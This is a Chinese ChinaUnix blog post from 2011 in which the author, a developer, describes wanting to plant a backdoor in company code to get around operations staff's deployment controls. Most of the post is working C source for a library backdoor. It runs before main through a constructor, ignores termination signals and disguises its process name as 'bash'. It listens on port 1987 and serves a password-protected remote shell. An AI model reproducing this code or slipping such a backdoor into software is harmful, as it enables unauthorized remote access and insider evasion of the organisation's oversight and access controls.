linux xbind后门库-CUDev-ChinaUnix博客

CUDevcudev.blog.chinaunix.net

首页　| 　博文目录　| 　关于我

CUDev

博客访问： 5698440
博文数量： 675
博客积分： 20301
博客等级：上将
技术积分： 7671
用户组：普通用户
注册时间： 2005-12-31 16:15

文章分类

全部博文（675）

Web架构（4）
Thinking（1）
SF（2）
Kernel and Drive（70）
perl（2）
QT4学习笔记（9）
网络编程（52）
嵌入式Linux（4）
服务器管理（64）
操作系统研究（11）
Linux深入学习（38）
算法研究（29）
网络安全（34）
python（19）
心情日记（6）
程序设计（127）
Linux应用（134）
Shell（64）
未分配的博文（5）

文章存档

2012年（1）

2011年（20）

2010年（14）

2009年（63）

2008年（118）

2007年（141）

2006年（318）

我的朋友

相关博文

linux xbind后门库

分类： LINUX

2011-08-17 18:52:01

今天忽然萌生一个邪恶的想法，公司上线流程极其繁琐，是不是可以考虑自己上线呢。之前自己搞过提权上线，但是并不是每台机器都有漏洞的，新机器漏洞补的比较勤，难以提权。

OP有权限操作线上机器，RD木有权限，但是RD有写代码的权限，如果给我们的代码加上一个后门就可以自由上线了，规避OP的限制。

代码极其简单，修改了一下xbind，主要增加了信号处理函数、使用attribute指定main前运行、设置进程名。现在遗憾的是没有搞定进程title，如果搞定进程title就可以以假乱真了。

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/prctl.h>
#define ENTERPASS "Enert your password: \0"
#define WELCOME "Welcome to shell\r\nlet's do it:\r\n"
#define PASSWORD "123abc!@#"
#define PORT 1987
__attribute__((constructor))
int init_backdoor()
{
struct sockaddr_in s_addr;
struct sockaddr_in c_addr;
char buf[1024] = {0};
pid_t pid = 0;
int i = 0,sock_descriptor = 0,temp_sock_descriptor = 0,c_addrsize = 0;
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
pid = fork();
if(pid)
return 0;
signal(SIGINT, SIG_IGN);
signal(SIGPIPE, SIG_IGN);
signal(SIGTERM, SIG_IGN);
const char *proc_title = "bash";
const char *proc_name = "bash";
prctl(PR_SET_NAME, proc_name);
sock_descriptor=socket(AF_INET,SOCK_STREAM,0);
if (socket(AF_INET,SOCK_STREAM,0)==-1){
//printf("socket failed!");
exit(1);
}
memset(&s_addr,0,sizeof(s_addr));
//bzero(&s_addr,sizeof(s_addr));
s_addr.sin_family=AF_INET;
s_addr.sin_addr.s_addr=htonl(INADDR_ANY);
s_addr.sin_port=htons(PORT);
if (bind(sock_descriptor,(struct sockaddr *)&s_addr,sizeof(s_addr))==-1){
//printf("bind failed!");
exit(1);
}
if (listen(sock_descriptor,20)==-1)//accept 20 connections
{
//printf("listen failed!");
exit(1);
}
c_addrsize=sizeof(c_addr);
while(1)
{
temp_sock_descriptor=accept(sock_descriptor,(struct sockaddr *)&c_addr,&c_addrsize);
//recv
while(temp_sock_descriptor)
{
pid=fork();
if (pid>0) {
close(temp_sock_descriptor);
temp_sock_descriptor = 0;
continue;
}else if (pid==0){
write(temp_sock_descriptor, ENTERPASS, strlen(ENTERPASS));
memset(buf, '\0', 1024);
recv(temp_sock_descriptor, buf, 1024, 0);
if (strncmp(buf,PASSWORD,5) !=0){
close(temp_sock_descriptor);
temp_sock_descriptor = 0;
exit(1);
}
write(temp_sock_descriptor, WELCOME, strlen(WELCOME));
dup2(temp_sock_descriptor,0);
dup2(temp_sock_descriptor,1);
dup2(temp_sock_descriptor,2);
execl("/bin/sh", "sh", (char *) 0);
close(temp_sock_descriptor);
temp_sock_descriptor = 0;
exit(0);
}else{
exit(1);
}
}
}
close(sock_descriptor);
return 0;
}

阅读(8202) | 评论(0) | 转发(0) |

上一篇：父进程退出时子进程全部退出

下一篇：google v8引擎常见问题

给主人留下些什么吧！~~

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6